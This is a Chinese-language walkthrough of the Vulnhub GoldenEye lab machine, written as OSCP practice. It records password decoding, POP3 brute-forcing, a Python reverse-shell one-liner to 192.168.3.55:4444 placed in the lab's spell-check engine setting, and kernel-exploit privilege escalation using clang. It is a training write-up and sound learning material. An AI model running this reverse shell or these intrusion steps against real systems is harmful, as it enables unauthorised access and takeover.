Vulnhub靶机GoldenEye通关笔记
¶前言
下载地址:https://www.vulnhub.com/entry/goldeneye-1,240/
接下来就开始为考OSCP做准备
https://www.freebuf.com/articles/neopoints/221948.html
我会把里面推荐的vulnhub的靶机都做一遍
htb的靶机要连openvpn才能做网络有点卡所以如果以后有时间再做
¶开始
nmap 扫描
打开网站是这样
右键查看源码里面给了提示
解码之后得到密码
账号:boris
密码 :InvincibleHack3r
Natalya 可疑人员 后面应该要用到
他说pop3开放在很高的端口 刚刚没有扫出来 再扫一遍
扫出两个端口
pop3端口如果是相邻的话 第一个端口是ssl/pop3 第二个是pop3
并且在源代码的最下面找到了这个
爆破出两个
boris:secret1!
Natalya:bird
登陆邮箱看看
在Natalya的邮箱中找到重要邮件
把那个网址加入hosts再访问 用给的账号密码的登陆
有上传点 穿了个一句话上去发现不能执行 只能下载 这一点卡了好久
发现有个messge
并且给了邮箱 爆破一下
真的爆破出来了
doak:goat
在私人文件里找到一点线索
strings一下得到一个base64
解密之后得到
xWinter1995x!
猜测是admin的密码
直接登陆上了
这里感觉可以利用一下
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.3.55',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
这个是检查拼写的引擎
要把引擎改成这个
反弹成功
查看系统版本
找到了exp 看一下
编译好上传上去了 但是没有gcc 不能正常运行
看看有没有替代gcc的工具
clang --help 发现安装了clang 用这个可以代替gcc
sed -i 's/gcc/clang/g' exp.c
成功提权
得到flag
¶总结
这次的渗透靶机设计的非常好,有ctf的风格也结合了实际的渗透技巧,也学到了新的技巧,当gcc被禁用的时候可以寻找代替的编译器 例如 clang cc